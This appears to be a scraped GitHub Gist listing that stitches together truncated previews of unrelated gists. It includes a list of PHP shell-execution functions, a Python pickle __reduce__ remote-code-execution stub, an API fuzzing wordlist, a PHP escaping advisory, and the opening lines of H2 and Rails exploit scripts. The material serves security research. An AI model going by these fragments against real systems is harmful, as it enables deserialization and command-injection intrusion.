exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
Jonoans
/ exploit.py
Created
June 20, 2020 15:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle | |
| import base64 | |
| class RCE(object): | |
| def __reduce__(self): | |
| return (globals, () ) | |
| class RCEStr(object): | |
| def __reduce__(self): | |
| return (str, (RCE(), ) ) |
zapalote
/ extract-gbooks-terms.py
Last active
April 2, 2024 11:31
Example of multi-threading and memory mapped file processing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # extraction pattern: ngram TAB year TAB match_count TAB volume_count NEWLINE | |
| # out: unique_ngram TAB sum(match_count) NEWLINE | |
| import re | |
| import os, sys, mmap | |
| from pathlib import Path | |
| from tqdm import tqdm | |
| from concurrent.futures import ThreadPoolExecutor | |
| abv = re.compile(r'^(([A-Z]\.){1,})(_|[^\w])') # A.B.C. |
yassineaboukir
/ List of API endpoints & objects
Last active
November 12, 2024 22:33
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
h4ckninja
/ h2-exploit.py
Created
September 25, 2018 08:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ''' | |
| Exploit Title: Unauthenticated RCE | |
| Date: 2018/09/24 | |
| Exploit Author: h4ckNinja | |
| Vendor: http://www.h2database.com/ | |
| Version: all versions | |
| Tested on: Linux, Mac |
Zenexer
/ escapeshellrce.md
Last active
October 11, 2024 16:26
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer
I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.
This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.
This advisory does not yet have associated CVE identifiers.
postmodern
/ rails_rce.rb
Last active
October 18, 2024 00:07
Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # | |
| # Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156) | |
| # | |
| # ## Advisory | |
| # | |
| # https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion | |
| # | |
| # ## Caveats | |
| # |